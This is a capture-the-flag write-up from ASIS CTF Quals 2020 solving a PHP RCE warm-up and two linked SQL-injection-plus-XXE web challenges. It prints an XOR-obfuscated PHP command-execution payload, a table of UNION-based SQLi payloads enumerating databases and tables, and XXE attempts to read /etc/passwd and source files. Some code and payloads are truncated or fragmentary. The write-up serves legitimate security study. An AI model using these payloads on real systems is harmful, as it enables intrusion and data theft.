Tags: sqli 

Rating: 5.0

Table of contents
- [Web](#web)
- [Web Warm-up](#web-warm-up)
- [Treasury #1](#treasury-1)
- [Treasury #2](#treasury-2)

# Web
## Web Warm-up
Points: 35
#### Description
>Warm up! Can you break all the tasks? I'll pray for you!
>read flag.php
>Link: [Link](
### Solution
When we access the link we get the next code:
/"`. Using this, we can achive RCE with the next exploit: ```$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);```. Breaking it down, we have:
- `$_="_GET"` (a variable called `_` with the value `_GET`)
- `${$_}[_]` (invoking `$_GET[_]` that will take the value from the query parameter called `_`. We will use this to pass a function)
- `(${$_}[__]);` (this will translate into `($_GET[__])`. We will use this as argument for the function we choose to pass)

The request's parameters that will get us the flag:


Flag: ASIS{w4rm_up_y0ur_br4in}

## Treasury #1
Points: 57
#### Description
>[A Cultural Treasury](https://poems.asisctf.com/)
### Solution
The site prompts us with a list of items, each one with two available actions:
- excerpt: view a fragment from the file
- read online: open a link from another domain(outside of the challenge scope)


I played a little with the site and this is everything that I found interesting:


We can make calls to get fragments of the books by providing the id of what we want to see. I played a little with the `type` parameter, but beside the values `excerpt` and `list` there's nothing else there. At this point I start trying for SQL injection on the `id` parameter.

There seems to be only entries with the id 1,2 and 3. If we enter any other value we get a HTTP 200 response with an empty body. So, if we provide the id 4, we get nothing. Keeping that in mind we try `4' or id='3` and we get the fragment that coresponds to id 3. Sweet!


Let's get the number of columns: `null' union select 'null`


Seems that the output from the database should be XML to be parsed by `simplexml_load_string()`. So, now we have to combine SQLi with XXE to advance.
Below are the payloads used with a description and the information gathered.

| Payload | Description | Information |
|```4' union select '<root><id>4</id><excerpt>a</excerpt></root>``` | Finding the structure of XML | returns `a`, so we can control the field `<exceprt></expert>`|
|```4' union select ']><root><id>4</id><excerpt>&tes;;</excerpt></root>``` | We test for XXE | We can view the content from /etc/passwd, so we can further exploit |
|```4' union select ']><root><id>4</id><excerpt>&tes;;</excerpt></root>``` | We retrieve as base64 the content from the `books.php` | Get the source code. [see below](#books.php) |
|```4' union select concat('<root><id>4</id><excerpt>',database(),'</excerpt></root>') where 'a'='a``` | Get the current DB | `ASISCTF`|
|```4' union select group_concat('<root><id>4</id><excerpt>',schema_name,'</excerpt></root>') from information_schema.schemata where ''=' -> returns information_schema``` | Try to get all the DBs | We get an error because this will have multiple `root` elements|
|```4' union select concat('<root><id>4</id><excerpt>',(select group_concat(0x7c,schema_name,0x7c) from information_schema.schemata),'</excerpt></root>') where ''='``` | Get all the DBs | We get `information_schema,ASISCTF`|
|```4' union select concat('<root><id>4</id><excerpt>',(select group_concat(0x7c,table_name,0x7c) from information_schema.tables where table_schema='ASISCTF'),'</excerpt></root>') where ''='```| Get tables from `ASISCTF` | We get `books`|
|```4' union select concat('<root><id>4</id><excerpt>',(select group_concat(0x7c,column_name,0x7c) from information_schema.columns where table_name='books'),'</excerpt></root>') where ''='```| Get columns from `books`| We get `id,info`|
|```4' union select concat('<root><id>4</id><excerpt>',(select group_concat(0x7c,id,0x7c) from books),'</excerpt></root>') where ''='```| Get all the ids, maybe something is hidden | We get `1,2,3`|
|```4' union select concat('<root><id>4</id><excerpt>',REPLACE((select group_concat(0x7c,info,0x7c) from books),'<','?'),'</excerpt></root>') where ''='```|Get the values from `info`| We get the flag: `?flag>OK! You can use ASIS{6e73c9d277cc0776ede0cbd36eb93960d0b07884} flag, but I keep the `/flag` file secure :-/?/flag>`. I had to replace the `<` to get a valid XML.


fetch_array(MYSQLI_NUM)) {
$books_info[] = (string) $row[0];
return $books_info;

function xml2array($xml) {
return array(
'id' => (string) $xml->id,
'name' => (string) $xml->name,
'author' => (string) $xml->author,
'year' => (string) $xml->year,
'link' => (string) $xml->link

function get_all_books() {
$books = array();
$books_info = fetch_books("");
foreach ($books_info as $info) {
$xml = simplexml_load_string($info, 'SimpleXMLElement', LIBXML_NOENT);
$books[] = xml2array($xml);
return $books;

function find_book($condition) {
$book_info = fetch_books($condition)[0];
$xml = simplexml_load_string($book_info, 'SimpleXMLElement', LIBXML_NOENT);
return $xml;

$type = @$_GET["type"];
if ($type === "list") {
$books = get_all_books();
echo json_encode($books);

} elseif ($type === "excerpt") {
$id = @$_GET["id"];
$book = find_book("id='$id'");
$bookExcerpt = $book->excerpt;
echo $bookExcerpt;

} else {
echo "Invalid type";

Flag: ASIS{6e73c9d277cc0776ede0cbd36eb93960d0b07884}

## Treasury #2
Points: 59
#### Description
>[A Cultural Treasury](https://poems.asisctf.com/)
### Solution
For full write-up please read the solution from [Treasury #1](#treasury-1). The challenges are related and I should copy almost everything from the write-up of the first challenge. As a summary: we can SQLi on the `id` parameter and from there we have to do a XXE to get the flag. If this doesn't make sense, please read the write-up of the first challenge.

After solving the previous challenge we get the next information:
>```<flag>OK! You can use ASIS{6e73c9d277cc0776ede0cbd36eb93960d0b07884} flag, but I keep the `/flag` file secure :-/</flag>```

We can combine SQLi with XXE to retrive the flag from `/flag`.

Payload: ```4' union select ']><root><id>4</id><excerpt>&tes;;</excerpt></root>```


Flag: ASIS{03482b1821398ccb5214d891aed35dc87d3a77b2}

Original writeup (https://github.com/saw-your-packet/ctfs/blob/master/ASIS%20CTF%20Quals%202020/Write-ups.md#treasury-1).